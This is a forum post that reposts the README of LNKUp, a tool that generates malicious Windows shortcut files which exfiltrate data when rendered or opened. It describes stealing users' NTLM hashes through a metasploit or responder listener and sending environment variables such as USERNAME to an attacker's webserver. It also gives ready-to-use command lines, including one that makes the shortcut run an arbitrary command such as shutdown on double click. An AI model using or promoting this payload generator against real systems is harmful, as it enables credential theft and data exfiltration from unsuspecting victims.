Nytro Posted August 16, 2017 Report Posted August 16, 2017 LNKUp LNK Data exfiltration payload generator This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data. Info I am not responsible for any actions you take with this tool! You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz. Known gotchas This tool will not work on OSX or Linux machines. It is specifically designed to target windows. There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it. You will need to run a responder or metasploit module server to capture NTLM hashes. To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this Installation Install requirements usingpip install -r requirements.txt Usage Payload types: NTLM Steals the user's NTLM hash when rendered. Needs listener server such as this metasploit module More on NTLM hashes leaking: https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/ Example usage:lnkup.py --host localhost --type ntlm --output out.lnk Environment Steals the user's environment variables. Examples: %PATH%, %USERNAME%, etc Requires variables to be set using --vars Example usage:lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk Extra: Use --execute to specify a command to run when the shortcut is double clicked Example:lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s" Sursa: https://github.com/Plazmaz/LNKUp 2 Quote
